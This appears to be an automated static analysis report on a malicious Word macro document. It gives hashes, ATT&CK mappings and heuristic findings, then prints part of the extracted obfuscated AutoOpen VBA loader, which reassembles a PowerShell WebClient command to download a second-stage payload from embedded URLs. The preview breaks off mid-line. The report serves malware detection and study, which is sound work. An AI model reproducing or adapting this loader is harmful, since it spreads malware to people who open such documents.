Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 849b3f295ab273af…

MALICIOUS

Office (OLE)

Size: 143.0 KB
Created: 2018-02-13 17:45:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 56805bf14c89898edbdbfc3f2bc5613e
SHA-1: d58211f30a5113eebbefa71e2ce9f4f7b9314219
SHA-256: 849b3f295ab273af747e97a08f1881eb450ad2a9acc96c8cff1a45f0038dcfc5
Risk Score: 302

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The file triggers the critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader that uses the CreateObject and Shell functions. An AutoOpen macro is present and attempts to execute code, likely to download and run a second-stage payload. Together, the VBA macros and the AutoOpen entry point strongly suggest a macro-based malware delivery mechanism.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6447965-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447965-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader [critical] (OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 31711 bytes
SHA-256: 050125806e7bde5229f3ad646aaeca992275490fc9e0f09a81328831e5e5fdd0
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rnBjvYfGMXFZ"
Sub AutoOpen()
On Error Resume Next
sJkkFmTcI = MoHw - Sgn(zFzYnVVERmaV) - (1862516 - Tan(3100425) / 3363170 - ChrW(SAzO))
uwBvXPPcu = ooi - Sgn(czT) - (9286772 - Tan(4118506) / 9947177 - ChrW(ESziRKMq))
BtoJiuBDE = XFs - Sgn(OwmrJ) - (7632932 - Tan(3872018) / 7243148 - ChrW(izqpiDRG))
Application.Run "SjMKQlCXakjl", sGulCvm
EDmsJAiwF = tPvzufuDz - Sgn(ZAYWQXJLrFXAn) - (9018242 - Tan(3630628) / 297374 - ChrW(QEwI))
vDMaWahDL = aDZjEfPcmqSFA - Sgn(scA) - (5901806 - Tan(8598161) / 4986520 - ChrW(wBjiwLvtw))
bIfKwwNOO = poSHpqDI - Sgn(taCKlQbCqC) - (1427218 - Tan(3800119) / 3892879 - ChrW(pPKZpHwOlQW))
End Sub
Function sGulCvm()
On Error Resume Next
udFozYA = QMnZQiUYcVKR - Sgn(YNFRLb) - (99377 - Tan(3401561) / 544234 - ChrW(RwrctfRsBPj))
trmcPVV = LkwcCE - Sgn(zJWs) - (3199593 - Tan(6322348) / 3026026 - ChrW(JFLRVN))
jILOK = WcZGasLdJ - Sgn(hJC) - (4072716 - Tan(4181720) / 6820049 - ChrW(wKFbuEav))
NYUfpSfnN = wGYhWAsJo + Mid(XiYYVskYfa + "mOVPnTYw+edSk'+'Nf7LkN+edS+edSLkNasfedS'+'+ed'+'SLkN+LedS+edSkNc inLkN+L'+'kN OLkN+LkNf7ALkN+L'+'PwwCdChQzwczUGtiMompCEAMracDC" + hKhFdVbRnR, 9, 89)
sUJdiXY = zdDqT - Sgn(TISH) - (458506 - Tan(6210752) / 5581370 - ChrW(vSvjOqY))
wdWnW = VTRDcC - Sgn(jluEljljptkQO) - (9122115 - Tan(7520657) / 7213630 - ChrW(JBQpEvKImhIj))
XiKoY = QcROiWHc - Sgn(mJjFndaJUhibu) - (5211894 - Tan(7205688) / 813129 - ChrW(pkwzzdzQdI))
TUcnwjBb = PHnpzNBjNTD + Mid(dOmfNpjWNunVmU + "IiWcbhSJDCqnisPvxW1+xW12BFL/?LkN+LkNhttxW1+xW1LkNxedS+edSW1+xW1+LkNp://LkN+LkNwww.xW1+xW1edS+edSsuacLkN+edS+edSLkNuLkedS+edSN+Lke'+'dS+iQAukbRYKBSb" + IAcYw, 17, 119)
LlXGowQh = VbJHR - Sgn(OcMi) - (9658736 - Tan(6146886) / 6424352 - ChrW(OWm))
WDipJBf = wUH - Sgn(TpIj) - (1134492 - Tan(6478178) / 4892647 - ChrW(bWJwKFSEI))
wRcLbWUPPrW = isoBMXzUQVAckV - Sgn(OIU) - (9827854 - Tan(6392618) / 9763819 - ChrW(DlCbWjsJDi))
skPNLCjH = zMQdNROHGwIjhc + Mid(aBwVB + "wMBjvlcVDzYfwwBJFzHN+LkxW1+xedS+'+'edSW1Ne-LkN+LkNILkN+LkNtemflS'+')LkN+LkN(Of7S'+'D'+'C);break;}catchxW1+xW1LkNxW1+xW1+LkNedS+edS{}LkN+LkN}LkN).RePLaczzTNKDuM" + KDjXfsnfjp, 20, 132)
VCwJiQXAI = Shijnwr - Sgn(OwNPzLDqhmwM) - (1066174 - Tan(5541221) / 3633584 - ChrW(kZOS))
phiwHD = jUKJmHRCFIzFH - Sgn(fklpsvuUdfuM) - (8054101 - Tan(2815576) / 5822344 - ChrW(NhYwfcCGNElnbd))
lMYZUbVMol = GwlnTwjWXwOriO - Sgn(RDYGvShIL) - (523883 - Tan(6483990) / 5982719 - ChrW(nKGszinNE))
bVMQICszIAF = ClOSRdkklQDazl + Mid(wwwwFbzBpDwk + "TihANiBwdUaDtUcptqhdLkN+LkNtem.LkN+LkNNet.WebedS'+'+edSCLkxW1+xW1N+LkNliLkN+LkNent;Of7NSLedS+edSkN+edS+edSLkNB = Of7LkN+L'+'kNnxW1+xW1sadaLkN+LkNsdLkN+LkedS+edSN.LkNxW1+xW1+LkNneLkN+'+'LkxW1+xW1NxtLkN+LkN(100VAuVnijB" + QbH, 22, 187)
ipLFPjNqhG = wbMNcOGRHjIvR - Sgn(npBbr) - (4408767 - Tan(3232444) / 850092 - ChrW(XipYjW))
BiJwQiDu = nIutbQaZF - Sgn(PQW) - (8692606 - Tan(6481740) / 5888063 - ChrW(cjShlAz))
mJAVshwWtOK = rMoimpauf - Sgn(AAXiXOcVqHzhV) - (8052108 - Tan(9951528) / 4224606 - ChrW(AEuCHuSjDlqTLo))
bcorlRXBk = KAdKBAQlXrn + Mid(iPViiZqZlmT + "sNuNtp:LkN+LxW1+xW1kN/xW1edS+edS+xW1LkN+'+'edS+edS'+'LkNxW'+'1+xW1/wLkN+edS+'+'edSL'+'kNww.exW1+xW1njoyexoLkN+LkNtictrLkN+xW1+xW1LkzkGMfGn" + iNrW, 4, 128)
tmPKi = lCfSdqUIV - Sgn(BrApmwDr) - (4886081 - Tan(2296479) / 7487951 - ChrW(CRPf))
owstjJz = KpXr - Sgn(pbTMiYzUXqNqri) - (7975157 - Tan(9135773) / 652771 - ChrW(CNZHpiANDwjJS))
hbIcHCfc = iGCZVZTiuFowuL - Sgn(jqLHvVdW) - (6385272 - Tan(7213701) / 8006942 - ChrW(QUwkN))
dYfqFTu = rAhdvuIDFP + Mid(rbKrw + "ouZFSJcMUnoHAr]39'+').edS+edSRePLaCeedS+edS(([cHAr]67+[cHAr]101+[cedS+edSHAr]118),[string][cHAr]36)J0b & ( ([stRiNG]OBYVErbosePreFeREnCe)[1,3]+xW1XxW1-JoInxW1xW'+'1)edS).REPlac'+'e(edMinHHkAaZiTXVQaCzKQpLbwr" + QtZqkqsFEwT, 12, 172)
vphIHHRC = DKvUbY - Sgn(DnAaldVwLC) - (2708669 - Tan(8494933) / 1081263 - Ch
... (truncated)